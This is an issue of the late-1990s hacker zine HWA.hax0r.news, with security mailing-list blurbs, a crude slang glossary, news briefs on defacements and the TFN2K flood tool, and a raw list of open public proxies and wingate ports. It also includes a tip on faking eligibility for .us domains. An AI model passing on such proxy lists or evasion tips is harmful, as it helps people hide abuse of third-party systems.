                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list's charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
    "CC" the bugtraq reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that
    reproduction of those words without your permission in any medium outside the distribution of this list may be
     challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

           Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
           News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
           Archivist: Brendan Kehoe
           Poof Reader:   Etaion Shrdlu, Jr.
           Shadow-Archivists: Dan Carosone / Paul Southworth
                              Ralph Sims / Jyrki Kuoppala
                              Ian Dickinson
           Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    



    @HWA


00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondents/affiliate members (Active)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       Zym0t1c ..........................: Dutch/Germany/Europe
       Sla5h.............................: Croatia
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already;
       also, if you want your emails listed, send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1. Although issues are a digest of recent news
       events, it's a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about, otherwise enjoy - Ed ...


    @HWA



00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
     Well, what does HWA stand for? Never mind, if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Praetorians after you.

     In case you couldn't figure it out, hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you
     up and comers, I'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine is
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavy equals" sign means "almost equal" to. If written
             as =/= (equals sign with a slash thru it) it also means !=, =< is equal
             to or less than and =>  is equal to or greater than (etc, this ain't
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin' way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but I'd
     like to see more reader input, help me out here, what's good, what sucks
     etc, not that I guarantee I'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer       astral              BHZ           ScrewUp
     Qubik          gov-boi             _Jeezus_      Haze_
     thedeuce       ytcracker           loophole      BlkOps
     
     Folks from #hwa.hax0r.news and #fawkerz, and other leet
     secret channels ... ;-)
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://www.hack.co.za  NEW
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
    ++ Hackers: Governments hacks pointless
    
       Contributed by Zym0t1c

       The Feds aren't the only ones who don't approve of hacker attacks on several
       government Web sites.  Some hackers are also condemning the exploits,
       calling them juvenile and pointless.

       Read the article at:
       http://www.zdnet.com/zdnn/stories/news/0,4586,2269312,00.html?chkpt=zdnnsmsa

    ++ Hackers say they'll take off New Year's
    
       Contributed by Zym0t1c

       Two hacking groups have struck again, defacing several Web pages around the
       Internet.  This time, however, they have a message for others looking to
       circumvent security on the Net:  Don't hack over the New Year's weekend.

       Read the article at:
       http://www.zdnet.com/zdnn/stories/news/0,4586,2413134,00.html

    ++ A Hacker Christmas
    
       Contributed by Zym0t1c

       Last-minute gift purchases for the hacker in the house, by Kevin Poulsen.

       Read the article at:
       http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html?chkpt=zdnnsmsa

   ++ Government asks hackers for Y2K break

      Contributed by Zym0t1c

      WASHINGTON - President Clinton's top aide on Y2K matters has urged computer
      hackers to exercise self-restraint until after year 2000 technology fears
      largely have passed.

      Read the article at:
      http://www.zdnet.com/zdnn/stories/news/0,4586,2408969,00.html?chkpt=zdnnsmsa

   ++ 'Net Attack' program threatens Internet sites
   
       Contributed by Zym0t1c 

       Just before New Year, a new version of the so called 'Net Attack' or Tribe
       Flood Network (TFN) program was released.  This version, TFN2K, is much more
       powerful and more difficult to detect.  Experts fear that hackers will use
       TFN to hack into networks while everybody is celebrating New Year.

       Read the Dutch article at:
       http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=3749
       
       

     
 
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, let's give the
      message board a bit more use eh? I'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
        
      
    
      ==============================================================================
      
      
      
      
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

     /*
          * w00t merry Christmas, Happy Hannukah or however the
          * fuck you spell it and Merry Yuletide etc etc oh ya
          * and Ramadan (Yeah I know its not this time of year
          * whatever, religion isn't what this is about), anyway
          * happy holidays and enjoy a new fun packed issue of HWA
          * complete with yer favourite info and proxy lists, smurf
          * amplifiers and some leet exploits.... werd up, and
          * get securing those boxes! hope you don't get called in
          * to fix script-kiddy damage over the holidays!
          *
          * Cruci
          *
          * cruciphux@dok.org
          * ICQ:58939315 note; not always online, do not abuse!
          * Preferred chat method: IRC Efnet in #HWA.hax0r.news
          *
          */
           
     printf ("EoF.\n");
           }
           
      Snailmail:
            
            HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5     

      

      Congrats, thanks, articles, news submissions and kudos to us at the
      main address: hwa@press.usmc.net complaints and all nastygrams and
      mailbombs can go to /dev/null, nukes, synfloods and papasmurfs to
      127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      
      
      Tip of the week: .us domains are free of charge to register. 
      http://www.nic.us/usdom-overview.html#Cost of course you need
      to be in the .us to use this (or figure out a way to phake it) *g*
      
                         
     
     
     
     
03.0  Socks proxies, Wingates and more from IRC4ALL
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by: HWA Staff (Yeah -Ed :-p)
      
      WELL MAINTAINED and updated site. Check it out for proxy info.
      highly recommended - Ed.
      
      This site is located at http://www.lightspeed.de/irc4all/
      
      No formatting, data is presented raw direct from site.
      Most proxies are socks4 or 5, wingates are 4, ports are
      commonly 1080 or 8080. If you don't know how to use these
      don't use them! - Ed
      
      Common ports for proxy use:

      Port         Wingate service
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       21          FTP Proxy Server
       23          Telnet Proxy Server
       53          DNS Proxy Server
       80          WWW Proxy Server
       110         POP3 Proxy Server
       808         Remote Control Service
       1080        SOCKS Proxy Server
       1090        Real Audio Proxy Server
       7000        VDOlive Proxy Server
       8000        XDMA Proxy Server
       8010        Log Service
       
       Not all services will work on all proxies/wingates, you will have to play
       with them and try them out. Also admins close these down frequently but
       there ARE active usable proxies on the following lists. Play nice and
       don't overuse or abuse. - Ed
       
      
      Public Proxies
      ~~~~~~~~~~~~~~
      Non transparent proxies, suggest you use http://www.lightspeed.de/irc4all/ 
      to test these when playing with them to see what info is passed.
       
      Location Provider  URL                                 Port      Protocol     
                                                                                                    
      NO                 webcache1.globalone.no                80      WWW / FTP                                                                      
      PH     Info        mail2.info.com.ph                   3128      WWW / FTP                                                                                                                                                          
      PH                 electron2.msc.net.ph                3128      WWW / FTP                                                                   
      PT    Teleweb      caclis01.teleweb.pt                 3128      WWW / FTP                                                                      
      QA    Qatarnet     proxy.qatar.net.qa                  8080      WWW / FTP                                                                                                                                                                    NetFilter
      RO                 lhab-gw.soroscj.ro                    80      WWW / FTP                                                                                                                                                                        
